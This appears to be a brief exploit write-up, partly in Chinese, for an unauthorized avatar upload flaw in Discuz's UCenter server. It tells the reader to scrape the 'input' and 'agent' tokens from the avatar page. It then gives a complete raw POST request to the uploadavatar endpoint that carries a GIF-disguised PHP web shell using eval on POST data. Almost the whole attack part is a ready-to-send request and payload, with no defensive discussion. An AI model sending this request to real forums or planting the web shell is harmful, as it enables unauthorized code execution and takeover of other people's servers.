2020-10-31 | PHP | UNLOCK

Discuz unauthrize UploadAvatar

Step:1

访问/home.php?mod=spacecp&ac=avatar
定位document.write 获取input与agent的值

1
<script type="text/javascript">document.write(AC_FL_RunContent('width','450','height','253','scale','exactfit','src','https://target/uc_server/images/camera.swf?inajax=1&appid=1&input=41cbZ23oN5148ORoSEgeos8JWiES%2B5wDqam00Hxtvsu63YIN%2BWXbh8i5o%2FVN8df5SUes9A1DGqZJaVw4v45OZGDJrV0%2FNmBHMMiq%2FI%2BIssTwT4CydgziZW9aJR2q&agent=0a48e95c5db00f30047be3181e9619dd&ucapi=https%3A%2F%2Ffuckoz.com%2Fuc_server&avatartype=virtual&uploadSize=2048','id','mycamera','name','mycamera','quality','high','bgcolor','#ffffff','menu','false','swLiveConnect','true','allowScriptAccess','always'));</script>

抓取input&agent

Step:2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /uc_server/index.php?m=user&inajax=1&a=uploadavatar&appid=1&input=d53a%2BTNCMbXNijOBlKrOMQTbwERgmxDPc2e1rRqPoMfcUK0vvC%2BZcxINh0n4nNThTVPrcwCK7Yh04z2P%2BPPAdlc0DydkdxNlMmIEtKruoRReFjR9iZNaSzzG7IIC&avatartype=virtual  HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36
Content-Type: multipart/form-data; boundary=----------KM7GI3ae0Ef1ei4ae0gL6Ij5ae0GI3
Content-Length: 453

------------KM7GI3ae0Ef1ei4ae0gL6Ij5ae0GI3
Content-Disposition: form-data; name="Filename"

1.gif
------------KM7GI3ae0Ef1ei4ae0gL6Ij5ae0GI3
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: application/octet-stream

GIF89a<?php phpinfo();eval($_POST[a])?>
------------KM7GI3ae0Ef1ei4ae0gL6Ij5ae0GI3
Content-Disposition: form-data; name="Upload"

Submit Query
------------KM7GI3ae0Ef1ei4ae0gL6Ij5ae0GI3--
PHP

评论加载中